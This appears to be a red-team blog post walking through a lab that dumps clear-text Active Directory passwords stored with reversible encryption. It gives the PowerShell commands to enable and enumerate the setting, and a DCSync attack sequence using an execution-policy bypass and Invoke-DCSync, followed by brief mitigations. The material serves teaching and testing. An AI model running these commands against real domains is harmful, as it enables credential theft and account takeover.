Credential Dumping – Active Directory Reversible Encryption

at 1:28 PM Tuesday, June 13, 2023

 Introduction

According to MITRE an adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.

·         MITRE TACTIC: Credential Dumping (ID: TA0006)

·         MITRE Technique Modify Authentication Process (T1556)

·         MITRE SUB ID: Reversible Encryption (T1556.005)

In Domain Controller user account reversible encryption is enabled, which means the encrypted data can be reversed back to the user’s password. The password stored with reversible encryption policy is not a hash since a function can be called to get back to the original clear-text password.

Do you know?

As per Microsoft: If you use the Challenge Handshake Authentication Protocol (CHAP) through remote access or Internet Authentication Services (IAS), you must enable this policy setting. CHAP is an authentication protocol that is used by remote access and network connections. Digest Authentication in Internet Information Services (IIS) also requires that you enable this policy setting.

 

Table of content

·         Lab Setup

·         DC-Sync Attack-Dump Plain text Password

·         Mitigation

·         Conclusion

Lab Setup

Enabling Reversible encryption in Active Directory Users

There is multiple methods to enable Reversible encryption property:

1)      User Account Property

Enable the Reversible encryption by modify the account property for Domain User account.

 




2)      Powershell Command

set-ADUser – AllowReversiblePasswordEncryption $true



3)      Group policy Management-

Enable the store password using reversible encryption with Computer Configuration\Windows Settings\Security Settings\Account Policies\Password Policy\

 

Validate the property through User’s property-Attribute Editor for UserAccountControl.

 


NOTE: Now if the system Administrator reset the password for the user account, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled.

Enumeration

PowerShell Command to find user enabled with allow reversible password encryption.

Get-ADUser -Filter {AllowReversiblePasswordEncryption -eq "true"} | Select Name, sAMAccountName

Attack: DC-Sync

In our Pervious article we have describe about DCsyn attack, read more from here. You can download the DC Sync Script tool here.

Commands to execute in the domain controller to check user clear text password.

powershell.exe -ep bypass

Import-Module .\Invoke-DCSync.ps1

Invoke-DCSync -AllData

 


DCSync shows the clear-text password of target user.

 


Mitigation

  • Ensure that Allow Reversible Password Encryption property is set to disabled.
  • Group policy store password using reversible encryption is set to disable.

Conclusion

In this article, we were able to decrypt the password of active directory user accounts. This article can serve as a reference for Red Team activists for Credential Dumping – Active Directory Plain Text Password.

Labels:

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)